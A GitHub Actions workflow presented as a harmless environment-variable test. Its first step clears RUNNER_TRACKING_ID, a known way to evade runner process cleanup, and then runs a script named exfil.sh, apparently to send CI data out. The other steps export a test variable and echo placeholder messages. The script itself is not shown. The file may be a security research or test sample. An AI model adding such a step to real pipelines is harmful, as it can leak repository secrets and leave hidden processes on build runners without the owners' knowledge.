name: Env Var Workflow

on:
  workflow_dispatch:

jobs:
  test_and_env:
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository
        uses: actions/checkout@v4

      - name: Run test bash command
        run: |
          echo "step 1" > step.txt
          RUNNER_TRACKING_ID="" && bash exfil.sh

      - name: Export an environment variable
        run: |
          echo "step 2" > step.txt
          echo "MY_TEST_VAR=hello-from-github-action" >> $GITHUB_ENV
          echo "Exported MY_TEST_VAR"
          sleep 3

      - name: Echo all environment variables
        run: |
          echo "Printing all environment variables:"
          sleep 3
